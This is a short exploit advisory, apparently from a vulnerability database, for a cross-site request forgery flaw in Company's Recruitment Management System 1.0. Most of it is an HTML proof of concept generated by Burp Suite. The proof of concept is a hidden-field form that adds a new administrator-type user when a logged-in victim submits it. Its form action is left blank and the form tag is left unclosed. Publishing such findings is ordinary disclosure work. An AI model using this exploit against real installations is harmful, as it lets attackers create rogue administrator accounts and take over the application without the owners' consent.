Company's Recruitment Management System 1.0 Cross Site Request Forgery

Company's Recruitment Management System version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | d34469cc623d90fb123d5a088d9dc81c

# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage:
# Software Link:
# Version: 1
# Tested on: Windows 10,XAMPP

The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.


<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action=""
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Test" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />

Related Posts